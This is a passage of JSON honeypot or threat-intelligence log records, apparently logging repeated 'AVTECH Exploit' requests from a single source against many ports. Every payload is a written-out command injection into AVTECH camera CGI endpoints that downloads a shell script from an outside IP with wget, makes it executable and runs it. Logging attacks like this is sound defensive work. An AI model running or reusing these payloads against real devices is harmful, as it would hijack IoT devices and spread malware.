- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:19:20Z",
- "last_seen": "2020-06-01T04:19:20Z"
- },
- {
- "event_id": "ef6881e9975035924d180c9348189a87776a6b6eb285dd206ba2c872d83916bf",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8139,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:19:19Z",
- "last_seen": "2020-06-01T04:19:19Z"
- },
- {
- "event_id": "285a26a1da21d8ea34f2c708a9b48ab358a741150d9eb243e73cd90cac1e5099",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:19:16Z",
- "last_seen": "2020-06-01T04:19:16Z"
- },
- {
- "event_id": "27af4087b754cd39c2510db31f312439724b8f36a3daeb858312958549acda79",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:19:14Z",
- "last_seen": "2020-06-01T04:19:14Z"
- },
- {
- "event_id": "2b66049c68080d811edfa133a788b0f2c48674906023e9ef046d83e729a951c2",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:19:13Z",
- "last_seen": "2020-06-01T04:19:13Z"
- },
- {
- "event_id": "364b388dd05b14c1e519a85206b8767582211e6469f633ce4afc590f30bc04ca",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:19:12Z",
- "last_seen": "2020-06-01T04:19:12Z"
- },
- {
- "event_id": "768ad42097e07244256196f9ee88fde2e8ec3cc98327cf51dbb7a0e8594d9fb4",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:19:11Z",
- "last_seen": "2020-06-01T04:19:11Z"
- },
- {
- "event_id": "6b6648e992f997195df875762c3e1e2c7bf018b21ef295bf953465312512a9b7",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:19:10Z",
- "last_seen": "2020-06-01T04:19:10Z"
- },
- {
- "event_id": "b61a681aa884645e38b76b547f1fff1b994dc3b95f9d947414f6a83d6106fe47",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:18:48Z",
- "last_seen": "2020-06-01T04:18:48Z"
- },
- {
- "event_id": "196dea2c8552e0ac5d4431df53ded89031a68a962f3d95632e8e7ba5644a0cab",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:18:46Z",
- "last_seen": "2020-06-01T04:18:46Z"
- },
- {
- "event_id": "ac8c0f16d363c5288319859e0e0c5d3cd566f10573b2f5b24c970d30702416a1",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:18:40Z",
- "last_seen": "2020-06-01T04:18:40Z"
- },
- {
- "event_id": "bbc3a7de7433d0452949589a2b6e2bcdb1f0e292913970bae6380610259eecb0",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 68.8UsA.sh; chmod 777 68.8UsA.sh; sh 68.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:18:38Z",
- "last_seen": "2020-06-01T04:18:38Z"
- },
- {
- "event_id": "974189c1569e0dc64ec072c2ad8dbafae0ad18c765e1332000c291fe1a9e77bc",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:17:20Z",
- "last_seen": "2020-06-01T04:17:20Z"
- },
- {
- "event_id": "940f9a6bde4ab72c5392db74a43f5ff4e70f6a44be0e3468a82eab34b3a44b27",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:17:18Z",
- "last_seen": "2020-06-01T04:17:18Z"
- },
- {
- "event_id": "08e0136041210d742a4066b7a3d237579a0e8ef91aa3183a640ea02594b413e8",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:17:18Z",
- "last_seen": "2020-06-01T04:17:18Z"
- },
- {
- "event_id": "40616e4815868fadf8edabd3066772aefe890a604082e25cf13597c6f939c289",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:17:16Z",
- "last_seen": "2020-06-01T04:17:16Z"
- },
- {
- "event_id": "b8e6b924123f674020f74906be7f3504b4960beb99cccf323bedefef5e52376e",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:17:16Z",
- "last_seen": "2020-06-01T04:17:16Z"
- },
- {
- "event_id": "add11e7c9bbbfb10e752fed7c51878ea34a54bf2328bffd72ad6fb9fd3134bc0",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:17:13Z",
- "last_seen": "2020-06-01T04:17:13Z"
- },
- {
- "event_id": "1177d7a922c27f3fe0803d31d22ac5931d9fba3d554a6a153c4dca0cece3f898",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:16:51Z",
- "last_seen": "2020-06-01T04:16:51Z"
- },
- {
- "event_id": "c3145d0943e61236d3fd476c0708c60a0c16fe38aea1fb2138b65e79d90034bb",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 12.8UsA.sh; chmod 777 12.8UsA.sh; sh 12.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T04:16:49Z",
- "last_seen": "2020-06-01T04:16:49Z"
- },
- {
- "event_id": "cfb75e22980f875aec783a481834581c0f6fb112a361b72c9b98072dc59b5b7e",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 50000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:16:15Z",
- "last_seen": "2020-06-01T01:16:15Z"
- },
- {
- "event_id": "636c4b99eb6d3d519154fc5e47afe069476081af460a76daa8cd4d5344a03aee",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 4369,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:16:10Z",
- "last_seen": "2020-06-01T01:16:10Z"
- },
- {
- "event_id": "f1f6a592a01d8cc77bc7499334212a16a860236e1e2a862f4c4409d1e0b9b4f1",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 4369,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:16:07Z",
- "last_seen": "2020-06-01T01:16:07Z"
- },
- {
- "event_id": "6637d392f18ecaa127c92ba0ac739b2d4657a037af0693733bda9f08f864211b",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 3791,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:14:07Z",
- "last_seen": "2020-06-01T01:14:07Z"
- },
- {
- "event_id": "67d420fe432a89deb88fb2d7e6b5788a3159430a95319d3236fa0aa34f1de8a6",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 3791,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:14:04Z",
- "last_seen": "2020-06-01T01:14:04Z"
- },
- {
- "event_id": "1fe27e9e8c0e5ed284b12066583b35e62f668fce986fd3e75bf79415fb24521d",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8112,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:13:10Z",
- "last_seen": "2020-06-01T01:13:10Z"
- },
- {
- "event_id": "8690757f70d299dd5a7128974900ea763941bf066243de4955a3a50f9fa7acb7",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8090,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T01:11:52Z",
- "last_seen": "2020-06-01T01:11:54Z"
- },
- {
- "event_id": "f37a039a94d7553b9686edd1c567c4438b218c00c86f0ff93c1bda89d16d1147",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8090,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T01:11:49Z",
- "last_seen": "2020-06-01T01:11:51Z"
- },
- {
- "event_id": "22e6d1737478012583306537f805913ac8381b3be2e2afb49076a488c6c90f9c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T00:51:58Z",
- "last_seen": "2020-06-01T01:11:32Z"
- },
- {
- "event_id": "a135f73f4c104830d13639a0bbaeaffcf1a5e71e2194a7ddfd09b61e1c04fd58",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T00:49:17Z",
- "last_seen": "2020-06-01T01:11:31Z"
- },
- {
- "event_id": "8febc78e331670b81dff0ef02c078b09fc7d0e90f91dd96294e24bc34f7f2d82",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8139,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-01T00:58:36Z",
- "last_seen": "2020-06-01T01:09:39Z"
- },
- {
- "event_id": "ac261f380ace0a39e8d340a5b9d7135eec62f20b795be9e12f442a29b15c1661",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9090,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:05:12Z",
- "last_seen": "2020-06-01T01:05:12Z"
- },
- {
- "event_id": "7836e43277c1c1adb68893f1d802ad5d38ff78abe3d6b1b9a7cedfb1331d587c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8009,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:03:09Z",
- "last_seen": "2020-06-01T01:03:09Z"
- },
- {
- "event_id": "fda62734e301eedb647f7fc26338ec84169a44af72f0f6f1cb902afdb74c5eaf",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:03:06Z",
- "last_seen": "2020-06-01T01:03:06Z"
- },
- {
- "event_id": "8d4d81c04db0f24b8525133dce8a6295c4ce7ff7ac86974274d6e64bd2025ef4",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 1400,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:03:06Z",
- "last_seen": "2020-06-01T01:03:06Z"
- },
- {
- "event_id": "48bb83e94682c826f2bf8a01192f43c25abf39252036a4a7fe56701a831b8d4d",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:03:05Z",
- "last_seen": "2020-06-01T01:03:05Z"
- },
- {
- "event_id": "a768a71f5715c4e41829cb368c2ad075bb61d472bfd2c6419a17cdc5e11a8c45",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 1400,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:03:04Z",
- "last_seen": "2020-06-01T01:03:04Z"
- },
- {
- "event_id": "24112276bacf665906f3bef978ebb9218496f5e6e6b0b2df7988c5a1139c1b38",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 86.8UsA.sh; chmod 777 86.8UsA.sh; sh 86.8UsA.sh)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2375,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T01:00:44Z",
- "last_seen": "2020-06-01T01:00:44Z"
- },
- {
- "event_id": "f6d9406b5069e04558c5fda93148ebdc23932063a4d7e25992621a5536f24a02",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
